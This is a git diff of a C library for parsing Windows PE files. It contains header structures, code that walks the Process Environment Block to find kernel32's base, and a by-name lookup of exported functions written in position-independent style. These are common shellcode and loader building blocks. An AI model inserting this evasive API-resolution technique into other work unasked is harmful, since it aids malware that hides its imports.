#define IMAGE_REL_ALPHA_REFQ2 0x0014 // Middle 16 bits of 48 bit reference
|
||||
#define IMAGE_REL_ALPHA_REFQ1 0x0015 // Low 16 bits of 48 bit reference
|
||||
#define IMAGE_REL_ALPHA_GPRELLO 0x0016 // Low 16-bit GP relative reference
|
||||
#define IMAGE_REL_ALPHA_GPRELHI 0x0017 // High 16-bit GP relative reference
|
||||
#define IMAGE_REL_PPC_ABSOLUTE 0x0000 // NOP
|
||||
#define IMAGE_REL_PPC_ADDR64 0x0001 // 64-bit address
|
||||
#define IMAGE_REL_PPC_ADDR32 0x0002 // 32-bit address
|
||||
#define IMAGE_REL_PPC_ADDR24 0x0003 // 26-bit address, shifted left 2 (branch absolute)
|
||||
#define IMAGE_REL_PPC_ADDR16 0x0004 // 16-bit address
|
||||
#define IMAGE_REL_PPC_REL24 0x0006 // 26-bit PC-relative offset, shifted left 2 (branch relative)
|
||||
#define IMAGE_REL_PPC_REL14 0x0007 // 16-bit PC-relative offset, shifted left 2 (br cond relative)
|
||||
#define IMAGE_REL_PPC_TOCREL16 0x0008 // 16-bit offset from TOC base
|
||||
#define IMAGE_REL_PPC_ADDR32NB 0x000A // 32-bit addr w/o image base
|
||||
#define IMAGE_REL_PPC_SECREL 0x000B // va of containing section (as in an image sectionhdr)
|
||||
#define IMAGE_REL_PPC_SECTION 0x000C // sectionheader number
|
||||
#define IMAGE_REL_PPC_IFGLUE 0x000D // substitute TOC restore instruction iff symbol is glue code
|
||||
#define IMAGE_REL_PPC_SECREL16 0x000F // va of containing section (limited to 16 bits)
|
||||
#define IMAGE_REL_PPC_REFLO 0x0011
|
||||
#define IMAGE_REL_PPC_PAIR 0x0012
|
||||
#define IMAGE_REL_PPC_SECRELHI 0x0014 // High 16-bit section relative reference (used for >32k TLS)
|
||||
#define IMAGE_REL_PPC_GPREL 0x0015
|
||||
#define IMAGE_REL_PPC_TOKEN 0x0016 // clr token
|
||||
#define IMAGE_REL_PPC_NEG 0x0100 // subtract reloc value rather than adding it
|
||||
#define IMAGE_REL_PPC_BRTAKEN 0x0200 // fix branch prediction bit to predict branch taken
|
||||
#define IMAGE_REL_PPC_BRNTAKEN 0x0400 // fix branch prediction bit to predict branch not taken
|
||||
#define IMAGE_REL_PPC_TOCDEFN 0x0800 // toc slot defined in file (or, data in toc)
|
||||
#define IMAGE_REL_SH3_DIRECT16 0x0001 // 16 bit direct
|
||||
#define IMAGE_REL_SH3_DIRECT32 0x0002 // 32 bit direct
|
||||
#define IMAGE_REL_SH3_DIRECT8_WORD 0x0004 // 8 bit direct .W (0 ext.)
|
||||
#define IMAGE_REL_SH3_DIRECT8_LONG 0x0005 // 8 bit direct .L (0 ext.)
|
||||
#define IMAGE_REL_SH3_DIRECT4 0x0006 // 4 bit direct (0 ext.)
|
||||
#define IMAGE_REL_SH3_DIRECT4_WORD 0x0007 // 4 bit direct .W (0 ext.)
|
||||
#define IMAGE_REL_SH3_PCREL8_WORD 0x0009 // 8 bit PC relative .W
|
||||
#define IMAGE_REL_SH3_PCREL8_LONG 0x000A // 8 bit PC relative .L
|
||||
#define IMAGE_REL_SH3_PCREL12_WORD 0x000B // 12 LSB PC relative .W
|
||||
#define IMAGE_REL_SH3_SIZEOF_SECTION 0x000D // Size of EXE section
|
||||
#define IMAGE_REL_SH3_SECTION 0x000E // Section table index
|
||||
#define IMAGE_REL_SH3_SECREL 0x000F // Offset within section
|
||||
#define IMAGE_REL_SH3_DIRECT32_NB 0x0010 // 32 bit direct not based
|
||||
#define IMAGE_REL_SH3_GPREL4_LONG 0x0011 // GP-relative addressing
|
||||
#define IMAGE_REL_SH3_TOKEN 0x0012 // clr token
|
||||
#define IMAGE_REL_SHM_PCRELPT 0x0013 // Offset from current
|
||||
#define IMAGE_REL_SHM_REFLO 0x0014 // Low bits of 32-bit address
|
||||
#define IMAGE_REL_SHM_REFHALF 0x0015 // High bits of 32-bit address
|
||||
#define IMAGE_REL_SHM_RELLO 0x0016 // Low bits of relative reference
|
||||
#define IMAGE_REL_SHM_RELHALF 0x0017 // High bits of relative reference
|
||||
#define IMAGE_REL_SHM_PAIR 0x0018 // offset operand for relocation
|
||||
#define IMAGE_REL_SH_NOMODE 0x8000 // relocation ignores section mode
|
||||
#define IMAGE_REL_ARM_ABSOLUTE 0x0000 // No relocation required
|
||||
#define IMAGE_REL_ARM_ADDR32 0x0001 // 32 bit address
|
||||
#define IMAGE_REL_ARM_ADDR32NB 0x0002 // 32 bit address w/o image base
|
||||
#define IMAGE_REL_ARM_BRANCH24 0x0003 // 24 bit offset << 2 & sign ext.
|
||||
#define IMAGE_REL_ARM_BRANCH11 0x0004 // Thumb: 2 11 bit offsets
|
||||
#define IMAGE_REL_ARM_TOKEN 0x0005 // clr token
|
||||
#define IMAGE_REL_ARM_GPREL7 0x0007 // GP-relative addressing (Thumb)
|
||||
#define IMAGE_REL_ARM_BLX24 0x0008
|
||||
#define IMAGE_REL_ARM_BLX11 0x0009
|
||||
#define IMAGE_REL_ARM_SECREL 0x000F // Offset within section
|
||||
#define IMAGE_REL_AM_ABSOLUTE 0x0000
|
||||
#define IMAGE_REL_AM_ADDR32NB 0x0002
|
||||
#define IMAGE_REL_AM_FUNCINFO 0x0004
|
||||
#define IMAGE_REL_AM_REL32_1 0x0005
|
||||
#define IMAGE_REL_AM_REL32_2 0x0006
|
||||
#define IMAGE_REL_AM_SECTION 0x0008
|
||||
#define IMAGE_REL_AM_TOKEN 0x0009
|
||||
#define IMAGE_REL_AMD64_ADDR64 0x0001 // 64-bit address (VA).
|
||||
#define IMAGE_REL_AMD64_ADDR32 0x0002 // 32-bit address (VA).
|
||||
#define IMAGE_REL_AMD64_REL32 0x0004 // 32-bit relative address from byte following reloc
|
||||
#define IMAGE_REL_AMD64_REL32_1 0x0005 // 32-bit relative address from byte distance 1 from reloc
|
||||
#define IMAGE_REL_AMD64_REL32_3 0x0007 // 32-bit relative address from byte distance 3 from reloc
|
||||
#define IMAGE_REL_AMD64_REL32_5 0x0009 // 32-bit relative address from byte distance 5 from reloc
|
||||
#define IMAGE_REL_AMD64_SECREL 0x000B // 32 bit offset from base of section containing target
|
||||
#define IMAGE_REL_AMD64_SECREL7 0x000C // 7 bit unsigned offset from base of section containing target
|
||||
#define IMAGE_REL_AMD64_SREL32 0x000E // 32 bit signed span-dependent value emitted into object
|
||||
#define IMAGE_REL_AMD64_SSPAN32 0x0010 // 32 bit signed span-dependent value applied at link time
|
||||
#define IMAGE_REL_IA64_IMM14 0x0001
|
||||
#define IMAGE_REL_IA64_IMM64 0x0003
|
||||
#define IMAGE_REL_IA64_DIR32 0x0004
|
||||
#define IMAGE_REL_IA64_PCREL21B 0x0006
|
||||
#define IMAGE_REL_IA64_PCREL21F 0x0008
|
||||
#define IMAGE_REL_IA64_LTOFF22 0x000A
|
||||
#define IMAGE_REL_IA64_SECTION 0x000B
|
||||
#define IMAGE_REL_IA64_SECREL22 0x000C
|
||||
#define IMAGE_REL_IA64_SECREL64I 0x000D
|
||||
#define IMAGE_REL_IA64_SECREL32 0x000E
|
||||
#define IMAGE_REL_IA64_DIR32NB 0x0010
|
||||
#define IMAGE_REL_IA64_SREL22 0x0012
|
||||
#define IMAGE_REL_IA64_SREL32 0x0013
|
||||
#define IMAGE_REL_IA64_UREL32 0x0014
|
||||
#define IMAGE_REL_IA64_PCREL60B 0x0016 // If possible, convert to MBB bundle with NOP.B in slot 1
|
||||
#define IMAGE_REL_IA64_PCREL60F 0x0017 // If possible, convert to MFB bundle with NOP.F in slot 1
|
||||
#define IMAGE_REL_IA64_PCREL60I 0x0018 // If possible, convert to MIB bundle with NOP.I in slot 1
|
||||
#define IMAGE_REL_IA64_PCREL60M 0x0019 // If possible, convert to MMB bundle with NOP.M in slot 1
|
||||
#define IMAGE_REL_IA64_IMMGPREL64 0x001A
|
||||
#define IMAGE_REL_IA64_TOKEN 0x001B // clr token
|
||||
#define IMAGE_REL_IA64_GPREL32 0x001C
|
||||
#define IMAGE_REL_IA64_ADDEND 0x001F
|
||||
#define IMAGE_REL_CEF_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_CEF_ADDR64 0x0002 // 64-bit address (VA).
|
||||
#define IMAGE_REL_CEF_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
|
||||
#define IMAGE_REL_CEF_SECTION 0x0004 // Section index
|
||||
#define IMAGE_REL_CEF_TOKEN 0x0006 // 32 bit metadata token
|
||||
#define IMAGE_REL_CEE_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_CEE_ADDR32 0x0001 // 32-bit address (VA).
|
||||
#define IMAGE_REL_CEE_ADDR64 0x0002 // 64-bit address (VA).
|
||||
#define IMAGE_REL_CEE_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
|
||||
#define IMAGE_REL_CEE_SECREL 0x0005 // 32 bit offset from base of section containing target
|
||||
#define IMAGE_REL_CEE_TOKEN 0x0006 // 32 bit metadata token
|
||||
#define IMAGE_REL_M32R_ADDR32 0x0001 // 32 bit address
|
||||
#define IMAGE_REL_M32R_ADDR32NB 0x0002 // 32 bit address w/o image base
|
||||
#define IMAGE_REL_M32R_ADDR24 0x0003 // 24 bit address
|
||||
#define IMAGE_REL_M32R_PCREL24 0x0005 // 24 bit offset << 2 & sign ext.
|
||||
#define IMAGE_REL_M32R_PCREL8 0x0007 // 8 bit offset << 2 & sign ext.
|
||||
#define IMAGE_REL_M32R_REFHALF 0x0008 // 16 MSBs
|
||||
#define IMAGE_REL_M32R_REFHI 0x0009 // 16 MSBs; adj for LSB sign ext.
|
||||
#define IMAGE_REL_M32R_REFLO 0x000A // 16 LSBs
|
||||
#define IMAGE_REL_M32R_PAIR 0x000B // Link HI and LO
|
||||
#define IMAGE_REL_M32R_SECTION 0x000C // Section table index
|
||||
#define IMAGE_REL_M32R_SECREL32 0x000D // 32 bit section relative reference
|
||||
#define IMAGE_REL_M32R_TOKEN 0x000E // clr token
|
||||
#define IMAGE_REL_EBC_ABSOLUTE 0x0000 // No relocation required
|
||||
#define IMAGE_REL_EBC_ADDR32NB 0x0001 // 32 bit address w/o image base
|
||||
#define IMAGE_REL_EBC_REL32 0x0002 // 32-bit relative address from byte following reloc
|
||||
#define IMAGE_REL_EBC_SECTION 0x0003 // Section table index
|
||||
#define IMAGE_REL_EBC_SECREL 0x0004 // Offset within section
|
||||
#define IMAGE_REL_BASED_ABSOLUTE 0
|
||||
#define IMAGE_REL_BASED_LOW 2
|
||||
#define IMAGE_REL_BASED_HIGHLOW 3
|
||||
#define IMAGE_REL_BASED_HIGHADJ 4
|
||||
#define IMAGE_REL_BASED_MIPS_JMPADDR 5
|
||||
#define IMAGE_REL_BASED_MIPS_JMPADDR16 9
|
||||
#define IMAGE_REL_BASED_DIR64 10
|
||||
#define IMAGE_ARCHIVE_START "!<arch>\n"
|
||||
#define IMAGE_ARCHIVE_PAD "\n"
|
||||
#define IMAGE_ARCHIVE_LINKER_MEMBER "/ "
|
||||
#define IMAGE_ARCHIVE_LONGNAMES_MEMBER "// "
|
||||
#define IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR 60
|
||||
#define IMAGE_ORDINAL_FLAG64 0x8000000000000000
|
||||
#define IMAGE_ORDINAL_FLAG32 0x80000000
|
||||
#define IMAGE_ORDINAL_FLAG IMAGE_ORDINAL_FLAG64
|
||||
#define IMAGE_RESOURCE_NAME_IS_STRING 0x80000000
|
||||
#define IMAGE_DEBUG_TYPE_UNKNOWN 0
|
||||
|
||||
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
|
||||
uint16_t e_magic; // Magic number
|
||||
uint16_t e_cblp; // Bytes on last page of file
|
||||
uint16_t e_cp; // Pages in file
|
||||
uint16_t e_crlc; // Relocations
|
||||
uint16_t e_cparhdr; // Size of header in paragraphs
|
||||
uint16_t e_minalloc; // Minimum extra paragraphs needed
|
||||
uint16_t e_maxalloc; // Maximum extra paragraphs needed
|
||||
uint16_t e_ss; // Initial (relative) SS value
|
||||
uint16_t e_sp; // Initial SP value
|
||||
uint16_t e_csum; // Checksum
|
||||
uint16_t e_ip; // Initial IP value
|
||||
uint16_t e_cs; // Initial (relative) CS value
|
||||
uint16_t e_lfarlc; // File address of relocation table
|
||||
uint16_t e_ovno; // Overlay number
|
||||
uint16_t e_res[4]; // Reserved words
|
||||
uint16_t e_oemid; // OEM identifier (for e_oeminfo)
|
||||
uint16_t e_oeminfo; // OEM information; e_oemid specific
|
||||
uint16_t e_res2[10]; // Reserved words
|
||||
uint32_t e_lfanew; // File address of new exe header
|
||||
} IMAGE_DOS_HEADER ;
|
||||
|
||||
typedef struct _IMAGE_FILE_HEADER {
|
||||
uint16_t Machine;
|
||||
uint16_t NumberOfSections;
|
||||
uint32_t TimeDateStamp;
|
||||
uint32_t PointerToSymbolTable;
|
||||
uint32_t NumberOfSymbols;
|
||||
uint16_t SizeOfOptionalHeader;
|
||||
uint16_t Characteristics;
|
||||
} IMAGE_FILE_HEADER;
|
||||
|
||||
typedef struct _IMAGE_DATA_DIRECTORY {
|
||||
uint32_t VirtualAddress;
|
||||
uint32_t Size;
|
||||
} IMAGE_DATA_DIRECTORY;
|
||||
|
||||
typedef struct _IMAGE_OPTIONAL_HEADER {
|
||||
//
|
||||
// Standard fields.
|
||||
//
|
||||
|
||||
uint16_t Magic;
|
||||
uint8_t MajorLinkerVersion;
|
||||
uint8_t MinorLinkerVersion;
|
||||
uint32_t SizeOfCode;
|
||||
uint32_t SizeOfInitializedData;
|
||||
uint32_t SizeOfUninitializedData;
|
||||
uint32_t AddressOfEntryPoint;
|
||||
uint32_t BaseOfCode;
|
||||
uint32_t BaseOfData;
|
||||
|
||||
//
|
||||
// NT additional fields.
|
||||
//
|
||||
|
||||
uint32_t ImageBase;
|
||||
uint32_t SectionAlignment;
|
||||
uint32_t FileAlignment;
|
||||
uint16_t MajorOperatingSystemVersion;
|
||||
uint16_t MinorOperatingSystemVersion;
|
||||
uint16_t MajorImageVersion;
|
||||
uint16_t MinorImageVersion;
|
||||
uint16_t MajorSubsystemVersion;
|
||||
uint16_t MinorSubsystemVersion;
|
||||
uint32_t Win32VersionValue;
|
||||
uint32_t SizeOfImage;
|
||||
uint32_t SizeOfHeaders;
|
||||
uint32_t CheckSum;
|
||||
uint16_t Subsystem;
|
||||
uint16_t DllCharacteristics;
|
||||
uint32_t SizeOfStackReserve;
|
||||
uint32_t SizeOfStackCommit;
|
||||
uint32_t SizeOfHeapReserve;
|
||||
uint32_t SizeOfHeapCommit;
|
||||
uint32_t LoaderFlags;
|
||||
uint32_t NumberOfRvaAndSizes;
|
||||
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
|
||||
} IMAGE_OPTIONAL_HEADER32;
|
||||
|
||||
typedef struct _IMAGE_OPTIONAL_HEADER64 {
|
||||
uint16_t Magic;
|
||||
uint8_t MajorLinkerVersion;
|
||||
uint8_t MinorLinkerVersion;
|
||||
uint32_t SizeOfCode;
|
||||
uint32_t SizeOfInitializedData;
|
||||
uint32_t SizeOfUninitializedData;
|
||||
uint32_t AddressOfEntryPoint;
|
||||
uint32_t BaseOfCode;
|
||||
uint64_t ImageBase;
|
||||
uint32_t SectionAlignment;
|
||||
uint32_t FileAlignment;
|
||||
uint16_t MajorOperatingSystemVersion;
|
||||
uint16_t MinorOperatingSystemVersion;
|
||||
uint16_t MajorImageVersion;
|
||||
uint16_t MinorImageVersion;
|
||||
uint16_t MajorSubsystemVersion;
|
||||
uint16_t MinorSubsystemVersion;
|
||||
uint32_t Win32VersionValue;
|
||||
uint32_t SizeOfImage;
|
||||
uint32_t SizeOfHeaders;
|
||||
uint32_t CheckSum;
|
||||
uint16_t Subsystem;
|
||||
uint16_t DllCharacteristics;
|
||||
uint64_t SizeOfStackReserve;
|
||||
uint64_t SizeOfStackCommit;
|
||||
uint64_t SizeOfHeapReserve;
|
||||
uint64_t SizeOfHeapCommit;
|
||||
uint32_t LoaderFlags;
|
||||
uint32_t NumberOfRvaAndSizes;
|
||||
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
|
||||
} IMAGE_OPTIONAL_HEADER64;
|
||||
|
||||
typedef struct _IMAGE_NT_HEADERS64 {
|
||||
uint32_t Signature;
|
||||
IMAGE_FILE_HEADER FileHeader;
|
||||
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
|
||||
} IMAGE_NT_HEADERS64;
|
||||
|
||||
typedef struct _IMAGE_NT_HEADERS {
|
||||
uint32_t Signature;
|
||||
IMAGE_FILE_HEADER FileHeader;
|
||||
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
|
||||
} IMAGE_NT_HEADERS32;
|
||||
|
||||
typedef struct _IMAGE_SECTION_HEADER {
|
||||
uint8_t Name[IMAGE_SIZEOF_SHORT_NAME];
|
||||
union {
|
||||
uint32_t PhysicalAddress;
|
||||
uint32_t VirtualSize;
|
||||
} Misc;
|
||||
uint32_t VirtualAddress;
|
||||
uint32_t SizeOfRawData;
|
||||
uint32_t PointerToRawData;
|
||||
uint32_t PointerToRelocations;
|
||||
uint32_t PointerToLinenumbers;
|
||||
uint16_t NumberOfRelocations;
|
||||
uint16_t NumberOfLinenumbers;
|
||||
uint32_t Characteristics;
|
||||
} IMAGE_SECTION_HEADER;
|
||||
|
||||
typedef struct _IMAGE_EXPORT_DIRECTORY {
|
||||
uint32_t Characteristics;
|
||||
uint32_t TimeDateStamp;
|
||||
uint16_t MajorVersion;
|
||||
uint16_t MinorVersion;
|
||||
uint32_t Name;
|
||||
uint32_t Base;
|
||||
uint32_t NumberOfFunctions;
|
||||
uint32_t NumberOfNames;
|
||||
uint32_t AddressOfFunctions; // RVA from base of image
|
||||
uint32_t AddressOfNames; // RVA from base of image
|
||||
uint32_t AddressOfNameOrdinals; // RVA from base of image
|
||||
} IMAGE_EXPORT_DIRECTORY;
|
||||
|
||||
typedef struct _IMAGE_IMPORT_BY_NAME {
|
||||
uint16_t Hint;
|
||||
uint8_t Name[1];
|
||||
} IMAGE_IMPORT_BY_NAME;
|
||||
|
||||
typedef struct _IMAGE_THUNK_DATA64 {
|
||||
union {
|
||||
uint64_t ForwarderString; // Puint8_t
|
||||
uint64_t Function; // PDWORD
|
||||
uint64_t Ordinal;
|
||||
uint64_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
|
||||
} u1;
|
||||
} IMAGE_THUNK_DATA64;
|
||||
|
||||
typedef struct _IMAGE_THUNK_DATA32 {
|
||||
union {
|
||||
uint32_t ForwarderString; // Puint8_t
|
||||
uint32_t Function; // PDWORD
|
||||
uint32_t Ordinal;
|
||||
uint32_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
|
||||
} u1;
|
||||
} IMAGE_THUNK_DATA32;
|
||||
|
||||
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
|
||||
union {
|
||||
uint32_t Characteristics; // 0 for terminating null import descriptor
|
||||
uint32_t OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
|
||||
} u1;
|
||||
uint32_t TimeDateStamp; // 0 if not bound,
|
||||
// -1 if bound, and real date\time stamp
|
||||
// in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
|
||||
// O.W. date/time stamp of DLL bound to (Old BIND)
|
||||
|
||||
uint32_t ForwarderChain; // -1 if no forwarders
|
||||
uint32_t Name;
|
||||
uint32_t FirstThunk; // RVA to IAT (if bound this IAT has actual addresses)
|
||||
} IMAGE_IMPORT_DESCRIPTOR;
|
||||
|
||||
#endif
|
|
@ -0,0 +1,66 @@
|
|||
//main.c
|
||||
#include <stdint.h>
|
||||
#include "stdfuncs.h"
|
||||
#include "peb.h"
|
||||
|
||||
/************************************************
|
||||
* returns data taken from the win process *
|
||||
* environment block reqEntry specifies which *
|
||||
* information you want to get returned. *
|
||||
* reqEntry = 1 returns base addr of own proc *
|
||||
* reqEntry = 0 returns baddr of kernel32/base *
|
||||
************************************************/
|
||||
void *get_peb_data(int reqEntry) {
|
||||
void *kernelMz;
|
||||
peb *peb;
|
||||
ldr_data_table_entry *ldte;
|
||||
|
||||
char kernelName[50];
|
||||
|
||||
|
||||
#if defined(__amd64__)
|
||||
#define KERNELNAME_LEN 10
|
||||
__asm__("mov %%fs:0x60, %0;\r\n"
|
||||
: "=r" (peb)
|
||||
:
|
||||
: "rax");
|
||||
kernelName[0] = 'K';
|
||||
kernelName[1] = 'E';
|
||||
kernelName[2] = 'R';
|
||||
kernelName[3] = 'N';
|
||||
kernelName[4] = 'E';
|
||||
kernelName[5] = 'L';
|
||||
kernelName[6] = 'B';
|
||||
kernelName[7] = 'A';
|
||||
kernelName[8] = 'S';
|
||||
kernelName[9] = 'E';
|
||||
|
||||
#else
|
||||
#define KERNELNAME_LEN 8
|
||||
__asm__("mov %%fs:0x30, %0;"
|
||||
: "=r" (peb)
|
||||
:
|
||||
: "eax");
|
||||
kernelName[0] = 'K';
|
||||
kernelName[1] = 'E';
|
||||
kernelName[2] = 'R';
|
||||
kernelName[3] = 'N';
|
||||
kernelName[4] = 'E';
|
||||
kernelName[5] = 'L';
|
||||
kernelName[6] = '3';
|
||||
kernelName[7] = '2';
|
||||
#endif
|
||||
if (reqEntry == 0) {
|
||||
ldte = (ldr_data_table_entry *)peb->pLdr->InInitializationOrderModuleList.next;
|
||||
while (-1 == ascii_ucode_find(kernelName, ldte->BaseDllName, KERNELNAME_LEN))
|
||||
ldte = (ldr_data_table_entry *)ldte->InInitializationOrderModuleList.next;
|
||||
return ldte->DllBase;
|
||||
}
|
||||
if (reqEntry == 1) {
|
||||
return peb->lpImageBaseAddress;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,52 @@
|
|||
#ifndef PEB
|
||||
#define PEB 1
|
||||
#include <stdint.h>
|
||||
void *get_peb_data(int reqEntry);
|
||||
|
||||
typedef struct _list_entry
|
||||
{
|
||||
void *next;
|
||||
void *prev;
|
||||
} list_entry;
|
||||
|
||||
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
|
||||
{
|
||||
uint32_t dwLength;
|
||||
uint32_t dwInitialized;
|
||||
void * lpSsHandle;
|
||||
list_entry InLoadOrderModuleList;
|
||||
list_entry InMemoryOrderModuleList;
|
||||
list_entry InInitializationOrderModuleList;
|
||||
void * lpEntryInProgress;
|
||||
} peb_ldr_data;
|
||||
|
||||
typedef struct __PEB // 65 elements, 0x210 bytes
|
||||
{
|
||||
uint8_t bInheritedAddressSpace;
|
||||
uint8_t bReadImageFileExecOptions;
|
||||
uint8_t bBeingDebugged;
|
||||
uint8_t bSpareBool;
|
||||
void * lpMutant;
|
||||
void * lpImageBaseAddress;
|
||||
peb_ldr_data *pLdr;
|
||||
} peb;
|
||||
|
||||
typedef struct _LDR_DATA_TABLE_ENTRY
|
||||
{
|
||||
//list_entry InLoadOrderLinks;
|
||||
//list_entry InMemoryOrderModuleList;
|
||||
/* we set the struct here: */
|
||||
list_entry InInitializationOrderModuleList;
|
||||
void * DllBase;
|
||||
void * EntryPoint;
|
||||
unsigned long SizeOfImage;
|
||||
void * FullDllName;
|
||||
void * BaseDllName;
|
||||
unsigned long Flags;
|
||||
uint16_t LoadCount;
|
||||
uint16_t TlsIndex;
|
||||
list_entry HashTableEntry;
|
||||
unsigned long TimeDateStamp;
|
||||
} ldr_data_table_entry;
|
||||
|
||||
#endif
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,73 @@
|
|||
//License: GPLv3.0
|
||||
#include "exports.h"
|
||||
|
||||
|
||||
uint16_t exports_get_ordinal_by_name(void *image, const char *name)
|
||||
{
|
||||
hdrs h;
|
||||
IMAGE_EXPORT_DIRECTORY *exDir;
|
||||
uint32_t *ent; //name table
|
||||
uint16_t *eot; //ordinal table
|
||||
|
||||
hdrs_init(&h, image);
|
||||
exDir = (IMAGE_EXPORT_DIRECTORY *)
|
||||
rva_to_ptr(image, hdrs_get_export_directory(&h));
|
||||
|
||||
ent = (uint32_t *)rva_to_ptr(image, exDir->AddressOfNames);
|
||||
eot = (uint16_t *)rva_to_ptr(image, exDir->AddressOfNameOrdinals);
|
||||
|
||||
for (int i = 0; i < exDir->NumberOfNames; i++)
|
||||
{
|
||||
if (0 == pic_strncmp(rva_to_ptr(image, ent[i]), name, pic_strlen(name)))
|
||||
return eot[i];
|
||||
}
|
||||
return -1;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *exports_get_function_by_ordinal(void *image, uint32_t ord)
|
||||
{
|
||||
IMAGE_EXPORT_DIRECTORY *exDir;
|
||||
hdrs h;
|
||||
uint32_t *eft; //export function table
|
||||
|
||||
hdrs_init(&h, image);
|
||||
exDir = (IMAGE_EXPORT_DIRECTORY *)
|
||||
rva_to_ptr(image, hdrs_get_export_directory(&h));
|
||||
eft = (uint32_t *)rva_to_ptr(image, exDir->AddressOfFunctions);
|
||||
return rva_to_ptr(image, eft[ord]);
|
||||
}
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *exports_get_function_by_name(void *image, const char *name)
|
||||
{
|
||||
IMAGE_EXPORT_DIRECTORY *exDir;
|
||||
hdrs h;
|
||||
uint32_t *eft; //export function table
|
||||
|
||||
hdrs_init(&h, image);
|
||||
exDir = (IMAGE_EXPORT_DIRECTORY *)
|
||||
rva_to_ptr(image, hdrs_get_export_directory(&h));
|
||||
eft = (uint32_t *)rva_to_ptr(image, exDir->AddressOfFunctions);
|
||||
return rva_to_ptr(image, eft[exports_get_ordinal_by_name(image, name)]);
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
char *exports_get_name_by_index(void *image, const uint32_t idx)
|
||||
{
|
||||
IMAGE_EXPORT_DIRECTORY *exDir;
|
||||
hdrs h;
|
||||
uint32_t *ent;
|
||||
|
||||
|
||||
hdrs_init(&h, image);
|
||||
exDir = (IMAGE_EXPORT_DIRECTORY *)
|
||||
rva_to_ptr(image, hdrs_get_export_directory(&h));
|
||||
ent = (uint32_t *)rva_to_ptr(image, exDir->AddressOfNames);
|
||||
if (idx >= exDir->NumberOfNames) return NULL;
|
||||
return (char *)rva_to_ptr(image, ent[idx]);
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
|
@ -0,0 +1,36 @@
|
|||
//License: GPLv3.0
|
||||
/*! \file exports.h
|
||||
\brief These functions can be used to get information from a PE files export header.
|
||||
*/
|
||||
#include "hdrs.h"
|
||||
#include "sections.h"
|
||||
#include "misc.h"
|
||||
|
||||
/*! \fn uint16_t exports_get_ordinal_by_name(void *image, const char *name)
|
||||
\brief returns the ordinal for the function you name
|
||||
\param image is a pointer to the first byte of the image you want to analyze
|
||||
\param name is a pointer on the name of the function you want to get the ordinal of
|
||||
*/
|
||||
uint16_t exports_get_ordinal_by_name(void *image, const char *name);
|
||||
|
||||
/*! \fn void *exports_get_function_by_name(void *image, const char *name)
|
||||
\brief returns a functions address
|
||||
\param image is a pointer to the pe image you want to analyze
|
||||
\param name is a pointer on the name of the API function you want the address of
|
||||
*/
|
||||
void *exports_get_function_by_name(void *image, const char *name);
|
||||
|
||||
/*! \fn char *exports_get_name_by_index(void *image, const uint32_t idx)
|
||||
\brief returns the first function name in the export headerif idx = 0, the second if idx = 1 and so on
|
||||
\param image is a pointer on the pe image
|
||||
\param idx is 0 for the first name and so on... (like an array index)
|
||||
*/
|
||||
char *exports_get_name_by_index(void *image, const uint32_t idx);
|
||||
/*! \fn void *exports_get_function_by_ordinal(void *image, uint32_t ord)
|
||||
\brief you give it an ordinal and you get a pointer to a function
|
||||
\param image <-- like above
|
||||
\param ord should be one of the values you can find in the odinal list
|
||||
of the PEs export table.
|
||||
*/
|
||||
void *exports_get_function_by_ordinal(void *image, uint32_t ord);
|
||||
|
|
@ -0,0 +1,453 @@
|
|||
//License: GPLv3.0
|
||||
#include "hdrs.h"
|
||||
|
||||
int hdrs_init(hdrs *self, void *image)
|
||||
{
|
||||
self->dos = (IMAGE_DOS_HEADER *)image;
|
||||
if (IMAGE_DOS_SIGNATURE != self->dos->e_magic)
|
||||
return -1;
|
||||
self->nt = (IMAGE_NT_HEADERS32*)&((char*)image)[self->dos->e_lfanew];
|
||||
if (IMAGE_NT_SIGNATURE != ((IMAGE_NT_HEADERS32*)self->nt)->Signature)
|
||||
return -1;
|
||||
self->file = &((IMAGE_NT_HEADERS32*)self->nt)->FileHeader;
|
||||
self->opt = &((IMAGE_NT_HEADERS32*)self->nt)->OptionalHeader;
|
||||
if (*(uint16_t *)self->opt == 0x20b)
|
||||
self->type = 64;
|
||||
else
|
||||
self->type = 32;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
//set and get functions for the file header //
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint16_t hdrs_get_machine_type(hdrs *self)
|
||||
{
|
||||
return self->file->Machine;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint16_t hdrs_get_number_of_sections(hdrs *self)
|
||||
{
|
||||
return self->file->NumberOfSections;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void hdrs_set_number_of_sections(hdrs *self, uint16_t setVal)
|
||||
{
|
||||
self->file->NumberOfSections = setVal;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t hdrs_get_time_date_stamp(hdrs *self)
|
||||
{
|
||||
return self->file->TimeDateStamp;
|
||||
}
|
||||
|
||||
